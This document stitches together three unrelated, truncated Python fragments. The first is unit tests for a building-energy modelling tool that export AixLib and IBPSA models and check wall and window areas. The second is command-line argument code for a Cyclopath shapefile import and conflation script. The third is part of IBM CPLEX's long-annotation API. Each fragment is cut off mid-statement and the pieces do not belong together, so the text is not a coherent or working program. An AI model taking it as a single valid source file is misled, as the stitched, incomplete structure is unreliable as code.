prj.number_of_elements_calc = 3
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_aixlib()
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_aixlib()
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_aixlib(building_model="Test",
zone_model="Test",
corG="Test")
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.buildings.append(prj.buildings[-1])
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_aixlib(path=utilities.get_default_path())
def test_export_ibpsa(self):
"""test of export_ibpsa, no calculation verification"""
prj.number_of_elements_calc = 1
prj.merge_windows_calc = True
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 1
prj.merge_windows_calc = False
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 2
prj.merge_windows_calc = True
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 2
prj.merge_windows_calc = False
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 3
prj.merge_windows_calc = True
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 3
prj.merge_windows_calc = False
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 4
prj.merge_windows_calc = True
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(library='AixLib')
prj.export_ibpsa(library='Buildings')
prj.export_ibpsa(library='BuildingSystems')
prj.export_ibpsa(library='IDEAS')
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(internal_id=prj.buildings[-1].internal_id)
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'IBPSA'
prj.calc_all_buildings()
prj.export_ibpsa(path=utilities.get_default_path())
prj.set_default()
def test_export_parameters_txt(self):
"""test of the export of the readable parameter output"""
helptest.building_test2(prj)
prj.number_of_elements_calc = 1
prj.merge_windows_calc = True
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 1
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 2
prj.merge_windows_calc = True
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 2
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 3
prj.merge_windows_calc = True
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 3
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 4
prj.merge_windows_calc = True
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt()
prj.number_of_elements_calc = 4
prj.merge_windows_calc = False
prj.used_library_calc = 'AixLib'
prj.calc_all_buildings()
prj.export_parameters_txt(path=utilities.get_default_path())
prj.set_default()
def test_instantiate_data_class(self):
"""test of instantiate_data_class"""
prj.instantiate_data_class()
def test_type_bldg_office(self):
"""test of type_bldg_office, no calculation verification
"""
prj.set_default(load_data=True)
prj.type_bldg_office(name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
office_layout=0,
window_layout=0,
construction_type="heavy")
prj.add_non_residential(
method='bmvbs',
usage='office',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
office_layout=0,
window_layout=0,
construction_type="heavy")
def test_type_bldg_institute(self):
"""test of type_bldg_institute, no calculation verification"""
prj.type_bldg_institute(name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
office_layout=0,
window_layout=0,
construction_type="heavy")
prj.add_non_residential(
method='bmvbs',
usage='institute',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=True,
office_layout=0,
window_layout=0,
construction_type="heavy")
def test_type_bldg_institute4(self):
"""test of type_bldg_institute4, no calculation verification"""
prj.type_bldg_institute4(name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
office_layout=0,
window_layout=0,
construction_type="heavy")
prj.add_non_residential(
method='bmvbs',
usage='institute4',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=True,
office_layout=0,
window_layout=0,
construction_type="heavy")
def test_type_bldg_institute8(self):
"""test of type_bldg_institute8, no calculation verification"""
prj.type_bldg_institute8(name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
office_layout=0,
window_layout=0,
construction_type="heavy")
prj.add_non_residential(
method='bmvbs',
usage='institute8',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=True,
office_layout=0,
window_layout=0,
construction_type="heavy")
def test_type_bldg_residential(self):
"""test of type_bldg_residential, no calculation verification"""
prj.type_bldg_residential(name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy")
prj.add_residential(
method='iwu',
usage='single_family_dwelling',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy")
def test_est_bldgs(self):
"""test of type_bldg_est, no calculation verification"""
prj.type_bldg_est1a(
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
neighbour_buildings=None,
construction_type=None)
prj.add_residential(
method='urbanrenet',
usage='est1a',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.type_bldg_est1b(
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
neighbour_buildings=None,
construction_type=None,
number_of_apartments=2)
prj.add_residential(
method='urbanrenet',
usage='est1b',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est2',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est3',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est4a',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.type_bldg_est4b(
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
neighbour_buildings=None,
construction_type=None,
number_of_apartments=2)
prj.add_residential(
method='urbanrenet',
usage='est4b',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est5',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est6',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.type_bldg_est7(
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
neighbour_buildings=None,
construction_type=None,
number_of_apartments=2)
prj.add_residential(
method='urbanrenet',
usage='est7',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est8a',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est8b',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
# methods in Building
def test_get_inner_wall_area(self):
"""test of get_inner_wall_area"""
prj.set_default()
helptest.building_test2(prj)
sum_area = prj.buildings[-1].get_inner_wall_area()
assert round(sum_area, 1) == 34.0
def test_set_outer_wall_area(self):
"""test of set_outer_wall_area"""
print(prj.buildings[-1].thermal_zones[-1].outer_walls[1].area)
prj.buildings[-1].set_outer_wall_area(2.0, 0.0)
therm_zone = prj.buildings[-1].thermal_zones[-1]
print(therm_zone.outer_walls[1].area)
assert round(therm_zone.outer_walls[0].area, 3) == 2.0
assert round(therm_zone.outer_walls[1].area, 3) == 14.0
def test_get_outer_wall_area(self):
"""test of get_outer_wall_area"""
prj.buildings[-1].get_outer_wall_area(0.0)
therm_zone = prj.buildings[-1].thermal_zones[-1]
assert round(therm_zone.outer_walls[0].area, 3) == 2.0
assert round(therm_zone.outer_walls[1].area, 3) == 14.0
def test_set_window_area(self):
"""test of set_window_area"""
prj.buildings[-1].set_window_area(1.0, 90.0)
therm_zone = prj.buildings[-1].thermal_zones[-1]
assert round(therm_zone.windows[0].area, 3) == 1.0
def test_get_window_area(self):
"""test of get_window_area"""
prj.buildings[-1].get_window_area(90.0)
therm_zone = prj.buildings[-1].thermal_zones[-1]
assert round(therm_zone.windows[0].area, 3) == 1.0
def test_fill_outer_wall_area_dict(self):
"""test of fill_outer_wall_area_dict"""
prj.buildings[-1].fill_outer_area_dict()
outwall_dict_round = {key: round(value, 2) for key, value in
prj.buildings[-1].outer_area.items()}
assert outwall_dict_round == {-2.0: 140,
| |
disjoint
# subgraphs.
self.add_argument('--known-point-xy', dest='known_pt_xy',
#action='append', default=[], nargs=2,
action='append',
# This is a point for Mpls-St. Paul/Minnesota.
#default=[480292.5, 4980909.8,],
default=[conf.known_node_pt_x, conf.known_node_pt_y,],
nargs=2,
help='a point on the connected tree; used to find disjoint islands')
# TODO: Delete this feature: this is a hack to accomodate some
# date problems I created.
self.add_argument('--fix-silent-delete-issue',
dest='fix_silent_delete_issue', action='store_true',
default=False, help=
'when new item OPERATION set to old item but old OPERATION empty')
self.add_argument('--use-old-stack-IDs-when-possible',
dest='use_old_stack_IDs_when_possible',
action='store_true', default=False, help=
"when two items are marked duplicates, used older item's stack ID")
# *** Second, preprocess items and create intermediate Shapefiles.
# For line segments, try matching items without a Cyclopath association
# to existing byways.
#
# You can run --init-importer and --try-matching iteratively
# before running --process-edits to clean up the data and
# make changes to this script.
self.add_argument('--try-matching', dest='try_matching',
action='store_true', default=False,
help='search cache for duplicate items (using Hausdorff, etc.)')
self.add_argument('--buffer-threshold', dest='buffer_threshold',
action='store', type=float,
#default=4.0, # 90457 match pairs, 296937 result features.
# FIXME: Test these...
#default=6.0,
default=10.0,
help='line segments within these many meters will be hausdorffed')
self.add_argument('--fragment-minimum', dest='fragment_minimum',
action='store', type=float,
#default=5,
#default=10,
default=4,
help='Fragments shorter than this cannot be trusted')
self.add_argument('--fragment-hausdorff-maximum', dest='frag_haus_max',
action='store', type=float,
#default=5,
default=10,
help=
'Hausdorff dist for frags less than this may indicate duplicates')
#
self.add_argument('--fragment-hausdorff-lenient',
dest='frag_haus_lenient', action='store', type=float,
#default=20,
default=30,
help='Like --fragment-hausdorff-maximum, but for strong addy matches')
self.add_argument('--show-conflations', dest='show_conflations',
action='store_true', default=False,
help='include features for each pair of conflated segments')
# The fragments Shapefiles can be, e.g., ten times larger than the
# everylayer Shapefile, so it's opt-in.
self.add_argument('--show-fragments', dest='show_fragments',
action='store_true', default=False,
help='make fragment geometry Shapefile that shows matching decisions')
# *** Third, lock down the revision table.
# See: Ccp_Script_Args' --instance-master
self.add_argument('--revision-user', dest='revision_user',
action='store', type=str, required=False, default='',
help='the username for the revision table; anon user if not set')
# *** Fourth, split the import across multiple cores by using
# --instance-worker, --items-limit, and --items-offset,
# and calling either of these two commands.
# Process edited items. This might be adding new ones, or editing or
# deleting existing items.
self.add_argument('--process-edits', dest='process_edits',
action='store_true', default=False,
help='search cache for and process edited features/items')
self.add_argument('--fix-gravel-unpaved-issue',
dest='fix_gravel_unpaved_issue', action='store_true', default=False,
help='remove erroneous gravel and unpaved tags from suspects')
self.add_argument('--merge-names', dest='merge_names',
action='store_true', default=False,
help='intelligently combine street names when merging items')
self.add_argument('--friendly-names', dest='friendly_names',
action='store_true', default=False,
help='convert DOT classifs to friendly names (e.g., MNTH->State Hwy')
# BUG nnnn: --last-edited-* is not used: Does OpenJUMP support this?
# If you don't want to check every item to see if it's been
# edited, you can do it smartly using a timestamp field.
#
self.add_argument('--last-edited-attr', dest='last_edited_attr',
action='store', type=str, default='',
help='name of the last-edited attribute (improves performance)')
self.add_argument('--last-edited-date', dest='last_edited_date',
action='store', type=str, default='',
help='assume feat unedited unless last-edited on or after this date')
self.add_argument('--check-everything', dest='check_everything',
action='store_true', default=False,
help='check all in Shapefile and not just feats with Operation')
self.add_argument('--checkout-revision', dest='checkout_revision',
action='store', type=int, default=None,
help='for testing, revision at which to checkout (default: latest)')
# *** Miscellaneous.
self.add_argument('--shapefile-srid', dest='shapefile_srid',
action='store', type=int, default=26915,
help='Shapefile srid to use to make crs')
self.add_argument('--shapefile-driver', dest='shapefile_driver',
action='store', type=str, default='ESRI Shapefile',
help='Shapefile driver to use')
# *** Import/Export the other geofeature types.
self.add_argument('--import', dest='do_import',
action='store_true', default=False,
help='import items from preprocessed Shapefile')
self.add_argument('--export', dest='do_export',
action='store_true', default=False,
help='export items to Shapefile')
# FIXME/BUG nnnn: Speed up vector checkout by eliminating link_values
# APRIL2014 from flashclient; keep them in the database and
# use them on commit, and maybe at other times, but
# limit their use in flashclient to try to speed up
# checkout and rendering and to reduce resource usage.
# Option A:
# 1. When exporting to Shapefile, option to also create
# and populate item cache tables.
# 2. On commit and elesewhere, keep cache table in sync
# with item data.
# 3. Use cache table to send public geometry,
# attributes, and link_value values, etc., to
# clients.
# Option B:
# 1. Remake the geofeature columns for the byway
# attributes (speed limit, etc.) and also make
# a tagged column (e.g., comma-separated text).
# 2. Get link_values for commit, but otherwise
# let client refer to attributes by name and not
# worry about their stack_ids or permissions, etc.
# FIXME/APRIL2014: For now, make sure flashclient isn't lazy-loading
# heavyweight link_values when in viewing mode.
self.add_argument('--item-type', dest='item_type',
action='store', type=str, required=False, default='byway',
help='type of item to import or export, if it cannot be discerned',
choices=('byway', 'region', 'terrain', 'waypoint',))
self.add_argument('--update-geosummary', dest='update_geomsummary',
action='store_true', default=False,
help='call revision.Revision.geosummary_update; skip for big edits')
self.add_argument('--import-fix-mndot-polies',
dest='import_fix_mndot_polies', action='store_true', default=False,
help='convert COUNTYNAME/MUNI_NAME/TWP_NAME it CCP_NAME')
# FIXME: APRIL2014: For re-conflating the State import data, we
# need to indicate the rids around the import, so we can
# ignore items we've edited since the import (since we can
# assume an edited item is considered audited and we don't
# have to try conflating it).
# Perhaps, e.g.,
# --first-suspect ==> --beg-conflation-rid / --fin-conflation-rid
# And/Or, e.g.,
# --first-suspect ==> --first-suspect / --final-suspect
# I.e., caller can specify an rid window or a stack ID window.
# Whatever items were created during the rid window, or
# whatever items' stack IDs fall in the stack ID window,
# are suspect, except those that have been edited since
# the window closed.
#
def verify_handler(self):
ok = Ccp_Script_Args.verify_handler(self)
num_actions = (0
+ (1 if self.cli_opts.init_importer else 0)
+ (1 if self.cli_opts.instance_master else 0)
+ (1 if self.cli_opts.try_matching else 0)
+ (1 if self.cli_opts.process_edits else 0)
+ (1 if self.cli_opts.do_import else 0)
+ (1 if self.cli_opts.do_export else 0)
)
if num_actions != 1:
actions = ['--init-importer',
'--instance-master',
'--try-matching',
'--process-edits',
'--import',
'--export',
]
log.error('Please specify one of %s' % (', '.join(actions),))
ok = False
if not self.cli_opts.init_importer:
self.master_worker_expected = True
if not self.cli_opts.instance_master:
if not self.cli_opts.source_dir:
log.error('Please specify --source-dir with this action')
ok = False
elif ((not self.cli_opts.do_export)
and (not os.path.exists(self.cli_opts.source_dir))):
log.error('The --source-dir was not found: %s'
% (self.cli_opts.source_dir,))
ok = False
if self.cli_opts.last_edited_attr:
if not self.cli_opts.last_edited_date:
log.error('Specify --last-edited-date w/ --last-edited-attr')
ok = False
else:
try:
# E.g., time.strptime('14 Mar 2014', '%d %b %Y')
self.cli_opts.last_edited_date = time.mktime(
time.strptime(self.cli_opts.last_edited_date, '%d %b %Y'))
except ValueError:
log.error('Last edited date should be, e.g., "14 Mar 2014".')
ok = False
if ( (( (self.cli_opts.item_type != 'byway')
or (not self.cli_opts.init_importer))
and ( #self.cli_opts.known_pt_xy or
self.cli_opts.fix_silent_delete_issue
or self.cli_opts.use_old_stack_IDs_when_possible))
or (( (self.cli_opts.item_type != 'byway')
or (not self.cli_opts.try_matching))
and ( self.cli_opts.show_conflations
or self.cli_opts.show_fragments))
or (( (self.cli_opts.item_type != 'byway')
or (not self.cli_opts.process_edits))
and ( self.cli_opts.friendly_names))
):
log.error('Incompatible cli switches. See --help')
ok = False
return ok
# *** Hausdorff_Import
class Hausdorff_Import(Ccp_Script_Base):
__slots__ = (
# We collect stats for the curious developer.
'stats',
# We symlink to the latest output Shapefiles (so that we don't
# overwrite previous output).
'target_path',
#
'target_schema',
'intermed_feats',
'slayers', # Shapefile layers, i.e., one layer == one shapefile
'everylayer', # The Everylayer is a copy of all other layers,
# too make searching for items by stack ID easy
# (in OpenJUMP, you search *per layer*, but you
# don't know what layer a random stack ID is in).
# During preprocessing, we count the number of times each unique stack ID
# is referenced so that we know which geofeatures we'll be splitting in
# twain. We use this information to tweak the feature when we write it to
# the intermediate shapefile, so that we can later save to the Cyclopath
# database using a multi-processor-aware approach.
'sid_use_count',
'sid_use_noops',
'sid_del_count',
'sid_del_lists',
'recorded_sids', # Stack IDs we've writ to the target Shapefiles.
# FIXME: Rename: CCP_FROMS_ ==> OTHERS_IDS
# FIXME: Rename: DELETE_ ==> OPERATION,
# and change the meaning of Y and N to D and U,
# as in, CRUD.
#
#
#
# A lookup of stack ID to OPERATION indication. This also includes
# CCP_FROMS_ since CCP_FROMS_ is just like OPERATION with stack IDs.
# FIXME: Remove CCP_FROMS_?
'sid_delete_froms', # Stack IDs mentioned by OPERATION and CCP_FROMS_.
# As part of preprocessing, we look for disjoint trees in the forest.
'the_forest', # All nodes, regardless of controlled access.
'sub_forest', # Only uncontrolled | |
# --------------------------------------------------------------------------
# File: _anno.py
# ---------------------------------------------------------------------------
# Licensed Materials - Property of IBM
# 5725-A06 5725-A29 5724-Y48 5724-Y49 5724-Y54 5724-Y55 5655-Y21
# Copyright IBM Corporation 2008, 2019. All Rights Reserved.
#
# US Government Users Restricted Rights - Use, duplication or
# disclosure restricted by GSA ADP Schedule Contract with
# IBM Corp.
# ------------------------------------------------------------------------
"""Annotation API"""
from ._baseinterface import BaseInterface
from . import _procedural as _proc
from . import _aux_functions as _aux
from . import _constants
class AnnotationObjectType(object):
"""Constants defining annotation object types."""
objective = _constants.CPX_ANNOTATIONOBJ_OBJ
variable = _constants.CPX_ANNOTATIONOBJ_COL
row = _constants.CPX_ANNOTATIONOBJ_ROW
sos_constraint = _constants.CPX_ANNOTATIONOBJ_SOS
indicator_constraint = _constants.CPX_ANNOTATIONOBJ_IND
quadratic_constraint = _constants.CPX_ANNOTATIONOBJ_QC
def __getitem__(self, item):
"""Converts a constant to a string.
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> c.long_annotations.object_type.objective
0
>>> c.long_annotations.object_type[0]
'objective'
"""
if item == _constants.CPX_ANNOTATIONOBJ_OBJ:
return "objective"
if item == _constants.CPX_ANNOTATIONOBJ_COL:
return "variable"
if item == _constants.CPX_ANNOTATIONOBJ_ROW:
return "row"
if item == _constants.CPX_ANNOTATIONOBJ_SOS:
return "sos_constraint"
if item == _constants.CPX_ANNOTATIONOBJ_IND:
return "indicator_constraint"
if item == _constants.CPX_ANNOTATIONOBJ_QC:
return "quadratic_constraint"
class AnnotationInterface(BaseInterface):
"""Methods for adding, querying, and modifying annotations."""
object_type = AnnotationObjectType()
"""See `AnnotationObjectType()` """
def _getnumobjtype(self, objtype):
if objtype == self.object_type.objective:
return 1
elif objtype == self.object_type.variable:
return _proc.getnumcols(self._env._e, self._cplex._lp)
elif objtype == self.object_type.row:
return _proc.getnumrows(self._env._e, self._cplex._lp)
elif objtype == self.object_type.sos_constraint:
return _proc.getnumsos(self._env._e, self._cplex._lp)
elif objtype == self.object_type.indicator_constraint:
return _proc.getnumindconstrs(self._env._e, self._cplex._lp)
elif objtype == self.object_type.quadratic_constraint:
return _proc.getnumqconstrs(self._env._e, self._cplex._lp)
else:
raise ValueError("invalid objtype")
class LongAnnotationInterface(AnnotationInterface):
"""Methods for adding, querying, and modifying long annotations."""
benders_annotation = _constants.CPX_BENDERS_ANNOTATION
"""String constant for the name of the Benders annotation."""
benders_mastervalue = _constants.CPX_BENDERS_MASTERVALUE
"""Default value for the Benders master partition."""
def __init__(self, cpx):
"""Creates a new LongAnnotationInterface.
The long annotation interface is exposed by the top-level `Cplex`
class as `Cplex.long_annotations`. This constructor is not meant
to be used externally.
"""
super(LongAnnotationInterface, self).__init__(
cplex=cpx, getindexfunc=_proc.getlongannoindex)
def get_num(self):
"""Returns the number of long annotations in the problem.
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> c.long_annotations.get_num()
0
>>> idx = c.long_annotations.add('ann1', 0)
>>> c.long_annotations.get_num()
1
"""
return _proc.getnumlonganno(self._env._e, self._cplex._lp)
def add(self, name, defval):
"""Adds an annotation to the problem.
name: the name of the annotation.
defval: the default value for annotation objects.
Returns the index of the added annotation.
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> idx = c.long_annotations.add(name='ann1', defval=0)
>>> c.long_annotations.get_num()
1
"""
# For Python 2.7, int() will automatically upconvert to long
# if necessary. For 3.x, there is only int (they have been
# unified).
def _add(name, defval):
_proc.newlonganno(
self._env._e, self._cplex._lp, name, int(defval),
self._env._apienc)
return self._add_single(self.get_num, _add, name, defval)
def delete(self, *args):
"""Deletes long annotations from the problem.
There are four forms by which long_annotations.delete may be
called.
long_annotations.delete()
deletes all long annotations from the problem.
long_annotations.delete(i)
i must be an annotation name or index. Deletes the long
annotation whose index or name is i.
long_annotations.delete(seq)
seq must be a sequence of annotation names or indices.
Deletes the long annotations with names or indices contained
within s. Equivalent to [long_annotations.delete(i) for i in s].
long_annotations.delete(begin, end)
begin and end must be annotation indices or annotation names.
Deletes the long annotations with indices between begin and
end, inclusive of end. Equivalent to
long_annotations.delete(range(begin, end + 1)). This will give
the best performance when deleting batches of long annotations.
See CPXdellongannotations in the Callable Library Reference
Manual for more detail.
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> idx = c.long_annotations.add('ann1', 0)
>>> c.long_annotations.get_num()
1
>>> c.long_annotations.delete(idx)
>>> c.long_annotations.get_num()
0
"""
def _delete(begin, end=None):
_proc.dellonganno(self._env._e, self._cplex._lp, begin, end)
_aux.delete_set_by_range(_delete, self._conv, self.get_num(), *args)
def get_names(self, *args):
"""Returns the names of a set of long annotations.
May be called by four forms.
long_annotations.get_names()
return the names of all long annotations in the problem.
long_annotations.get_names(i)
i must be an annotation name or index. Returns the name of
long annotation i.
long_annotations.get_names(seq)
seq must be a sequence of annotation names or indices.
Returns the names of long annotations with names or indices in
s. Equivalent to
[long_annotations.get_names(i) for i in s]
long_annotations.get_names(begin, end)
begin and end must be annotation indices or annotation names.
Returns the names of long annotations with indices between
begin and end, inclusive of end. Equivalent to
long_annotations.get_names(range(begin, end + 1))
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> [c.long_annotations.add('ann{0}'.format(i), i)
... for i in range(1, 6)]
[0, 1, 2, 3, 4]
>>> c.long_annotations.get_names()
['ann1', 'ann2', 'ann3', 'ann4', 'ann5']
>>> c.long_annotations.get_names(0)
'ann1'
>>> c.long_annotations.get_names([0, 2, 4])
['ann1', 'ann3', 'ann5']
>>> c.long_annotations.get_names(1, 3)
['ann2', 'ann3', 'ann4']
"""
def _get_names(idx):
return _proc.getlongannoname(
self._env._e, self._cplex._lp, idx,
self._env._apienc)
return _aux.apply_freeform_one_arg(
_get_names, self._conv, self.get_num(), args)
def get_default_values(self, *args):
"""Returns the default value of a set of long annotations.
May be called by four forms.
long_annotations.get_default_values()
return the default values of all long annotations in the
problem.
long_annotations.get_default_values(i)
i must be an annotation name or index. Returns the default
value of long annotation i.
long_annotations.get_default_values(seq)
seq must be a sequence of annotation names or indices.
Returns the default values of long annotations with names or
indices in s. Equivalent to
[long_annotations.get_default_values(i) for i in s]
long_annotations.get_default_values(begin, end)
begin and end must be annotation indices or annotation names.
Returns the default values of long annotations with indices
between begin and end, inclusive of end. Equivalent to
long_annotations.get_default_values(list(range(begin, end + 1)))
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> idx1 = c.long_annotations.add(name='ann1', defval=0)
>>> idx2 = c.long_annotations.add(name='ann2', defval=1)
>>> c.long_annotations.get_default_values()
[0, 1]
"""
def _getdefval(idx):
return _proc.getlongannodefval(
self._env._e, self._cplex._lp, idx)
return _aux.apply_freeform_one_arg(
_getdefval, self._conv, self.get_num(), args)
def set_values(self, idx, objtype, *args):
"""Sets the values for objects in the specified long annotation.
idx: the long annotation index or name.
objtype: the annotation object type.
Can be called by two forms:
long_annotations.set_values(idx, objtype, i, val)
i must be a name or index. Changes the long annotation value
of the object identified by i.
long_annotations.set_values(idx, objtype, seq)
seq is a sequence of pairs (i, val) as described above.
Changes the long annotation values for the specified objects.
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> idx = c.long_annotations.add('ann1', 0)
>>> objtype = c.long_annotations.object_type.objective
>>> c.long_annotations.set_values(idx, objtype, 0, 1)
>>> c.long_annotations.get_values(idx, objtype, 0)
1
>>> indices = c.variables.add(names=['v1', 'v2', 'v3'])
>>> objtype = c.long_annotations.object_type.variable
>>> c.long_annotations.set_values(idx, objtype,
... [(i, 1) for i in indices])
>>> c.long_annotations.get_values(idx, objtype)
[1, 1, 1]
"""
def _set_values(ind, val):
